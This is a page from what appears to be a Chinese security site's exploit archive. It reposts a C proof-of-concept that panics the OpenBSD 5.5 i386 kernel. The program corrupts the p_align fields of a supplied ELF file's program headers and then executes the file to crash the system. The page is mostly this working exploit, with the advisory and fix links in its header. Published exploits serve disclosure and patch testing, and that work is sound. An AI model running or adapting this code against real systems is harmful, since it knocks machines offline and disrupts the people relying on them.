首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OpenBSD 5.5 Local Kernel Panic
来源:@nitr0usmx 作者:nitr0us 发布时间:2014-10-24  

/*
 * tenochtitlan.c
 *
 * OpenBSD <= 5.5 Local Kernel Panic
 * by Alejandro Hernandez (@nitr0usmx)
 *
 * Advisory and technical details:
 * http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf
 *
 * Fix: http://www.openbsd.org/errata55.html#013_kernexec
 *
 * This PoC works only for i386.
 *
 * Bug found with Melkor (ELF file format fuzzer)
 * https://github.com/IOActive/Melkor_ELF_Fuzzer
 *
 * Mexico / Oct 2014
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>

#ifndef  __OpenBSD__
 #error "Not an OpenBSD system !!!1111";
#else
#include <sys/exec_elf.h>
#endif

#ifndef __i386__
 #error "Not an i386 system !!!1111";
#endif

// In Aztec mythology, Huitzilopochtli, was a god of war, a sun god,
// the patron of the city of Tenochtitlan, the Capital of the Aztec Empire.
const char pyramid[] =
"                  _____\n"
"                 _|[]_|_\n"
"               _/_/=|_\\_\\_\n"
"             _/_ /==| _\\ _\\_\n"
"           _/__ /===|_ _\\ __\\_\n"
"         _/_ _ /====| ___\\  __\\_\n"
"       _/ __ _/=====|_ ___\\ ___ \\_\n"
"     _/ ___ _/======| ____ \\_  __ \\_\n";

struct {
 unsigned int idx;
 Elf32_Word   p_align;
} targets[] = {
 { 6, 0xb16b00b5 }, // (  *  )(  *  )
 { 6, 0xdeadface },
 { 4, 0x00001001 },
 { 0, 0x00000004 }
};

int main(int argc, char **argv)
{
 Elf32_Ehdr *hdr;
 Elf32_Phdr *pht; // Program Header Table
 struct stat statinfo;
 char *elfptr;
 int fd, r;

 if(argc < 2){
  fprintf(stderr, "Usage: %s <elf_executable>\n", argv[0]);
  exit(-1);
 }

 if((fd = open(argv[1], O_RDWR)) == -1){
  perror("open");
  exit(-1);
 }

 if(fstat(fd, &statinfo) == -1){
  perror("stat");
  close(fd);
  exit(-1);
 }

 if((elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
  perror("mmap");
  close(fd);
  exit(-1);
 }

 hdr = (Elf32_Ehdr *) (elfptr);
 pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);

 printf("[*] hdr->e_phoff:\t0x%.4x\n", hdr->e_phoff);
 printf("[*] hdr->e_phnum:\t0x%.4x\n", hdr->e_phnum);

 srand(time(NULL));
 r = rand();

 if(r % 3 == 0){
#ifdef OpenBSD5_5
  pht[targets[0].idx].p_align = targets[0].p_align;
  printf("[*] PHT[%d].p_align = 0x%x\n", targets[0].idx, pht[targets[0].idx].p_align);
#else // OpenBSD 5.2 didn't panic with 0xb16b00b5 in the last LOAD's p_align
  pht[targets[1].idx].p_align = targets[1].p_align;
  printf("[*] PHT[%d].p_align = 0x%x\n", targets[1].idx, pht[targets[1].idx].p_align);
#endif
 } else if(r % 3 == 1){
  pht[targets[2].idx].p_align = targets[2].p_align;
  printf("[*] PHT[%d].p_align = 0x%x\n", targets[2].idx, pht[targets[2].idx].p_align);
 } else {
  int p;

  for(p = 0; p < hdr->e_phnum; p++, pht++)
   if(pht->p_type == PT_LOAD){
    pht->p_align = targets[3].p_align;
    printf("[*] PHT[%d].p_align = 0x%x\n", p, pht->p_align);
   }
 }

 // Synchronize the ELF in memory and the file system
 if(msync(elfptr, 0, MS_ASYNC) == -1){
  perror("msync");
  close(fd);
  exit(-1);
 }

 if(munmap(elfptr, statinfo.st_size) == -1){
  perror("munmap");
  close(fd);
  exit(-1);
 }

 close(fd);

 printf("%s", pyramid);

 sleep(1);
 system(argv[1]);

 // Should never reach this point, however sometimes the OS didn't crash with
 // system() until the 2nd execution. Same behavior with execl and execv too.
 printf("... try to execute %s manually.\n", argv[1]);

 return -1;
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WordPress / Joomla Creative Co
·Centreon SQL / Command Injecti
·Free WMA MP3 Converter 1.8 Buf
·Windows OLE - Remote Code Exec
·Free WMA MP3 Converter 1.8 SEH
·Creative Contact Form (Wordpre
·Feng Office 1.7.4 - Arbitrary
·HP Operations Agent Remote XSS
·DotNetNuke DNNspot Store 3.0.0
·Incredible PBX 2.0.6.5.0 - Rem
·Incredible PBX 11 2.0.6.5.0 Re
·vBulletin 4.x Tapatalk Blind S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved